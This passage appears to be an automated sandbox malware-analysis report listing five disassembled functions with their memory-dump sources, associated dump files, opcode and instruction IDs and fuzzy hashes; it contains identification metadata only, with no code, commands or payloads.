                                      • Instruction Fuzzy Hash: 66218BF3F106110BF3588878C8A53B66283D7C4324F2F82398F06AB3CAE97D8D025284
                                      Function 010881CB Relevance: .1, Instructions: 72COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2181494747.0000000000FE5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                      • Associated: 00000000.00000002.2181419846.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181434322.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181434322.0000000000FD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181480794.0000000000FE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001245000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181714377.0000000001283000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181813159.000000000141B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181827654.000000000141C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f90000_file.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ab52bbc3bf10678e9e328ba59f1c1046e5d758a87db5aa26f537229d5b16ba26
                                      • Instruction ID: 2039349e680ba9285261be56288fac1ea2f3704d2ef5375f68c199f57291108c
                                      • Opcode Fuzzy Hash: ab52bbc3bf10678e9e328ba59f1c1046e5d758a87db5aa26f537229d5b16ba26
                                      • Instruction Fuzzy Hash: A2213DF3F5252587F3908876CD493A621839BE1321F2F86748B0CABEC9D97E990B5244
                                      Function 00FBA060 Relevance: .1, Instructions: 63COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2181434322.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                      • Associated: 00000000.00000002.2181419846.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181434322.0000000000FD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181480794.0000000000FE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001245000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181714377.0000000001283000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181813159.000000000141B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181827654.000000000141C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f90000_file.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d6f3737fdae1c0a01f48b6376bcbd426907f24c0dc4d500755e45f99c257de23
                                      • Instruction ID: d0439c209b1fce1c52003d92e065bcbe83cf131af33613f816623d9e87eca126
                                      • Opcode Fuzzy Hash: d6f3737fdae1c0a01f48b6376bcbd426907f24c0dc4d500755e45f99c257de23
                                      • Instruction Fuzzy Hash: 1E0184F5B0070157EB30BE56D8C176BB2A86F81794F19442CE90497242EB7AEC19EE92
                                      Function 00FBB3DE Relevance: .0, Instructions: 40COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2181434322.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                      • Associated: 00000000.00000002.2181419846.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181434322.0000000000FD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181480794.0000000000FE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001245000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181714377.0000000001283000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181813159.000000000141B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181827654.000000000141C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f90000_file.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e10e4db7777315f0c35a3f678b580668dc14d4818b4a0128475b6e281406565a
                                      • Instruction ID: 33c45d316d24bd65d61bdda3a7b1de766d912fd15516e8ee7a1b38dc7546ba3a
                                      • Opcode Fuzzy Hash: e10e4db7777315f0c35a3f678b580668dc14d4818b4a0128475b6e281406565a
                                      • Instruction Fuzzy Hash: C0F0B4259896C385C319CF3E8070371FFE18F77261F2C5569C4D257382D76A8809AB15
                                      Function 00FBB475 Relevance: .0, Instructions: 16COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2181434322.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                      • Associated: 00000000.00000002.2181419846.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181434322.0000000000FD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181480794.0000000000FE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001245000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181714377.0000000001283000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181813159.000000000141B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181827654.000000000141C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f90000_file.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4353dae0229f4739eda1ce46e19f49cbab95873c366f68d91b6ce0e04061036c
                                      • Instruction ID: e7bae5bd55d1a7433105703ba685b960fb55abbc5c15ff7a564ab791a340ebc5
                                      • Opcode Fuzzy Hash: 4353dae0229f4739eda1ce46e19f49cbab95873c366f68d91b6ce0e04061036c
                                      • Instruction Fuzzy Hash: B9D022749064025BC248DF20EE22939B36A9F476DAB10202DE403EB313CE28E870D90B
                                      Function 00F9C274 Relevance: .0, Instructions: 13COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2181434322.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                      • Associated: 00000000.00000002.2181419846.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181434322.0000000000FD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181480794.0000000000FE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001245000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181714377.0000000001283000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181813159.000000000141B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181827654.000000000141C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f90000_file.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 45e0157607ae2469e2abaaf83f3d329c4b9aa9e9e38cb42914cae1646e570b21
                                      • Instruction ID: 2c5888ce971b4644a8b35bc19723c19372a12fb83b1e3e1d6938c720a68c255f
                                      • Opcode Fuzzy Hash: 45e0157607ae2469e2abaaf83f3d329c4b9aa9e9e38cb42914cae1646e570b21
                                      • Instruction Fuzzy Hash: ACD0122094B29D4AC3568F3C9CA1775B7B2EB53100F042549C142DB291C7D09016A6A8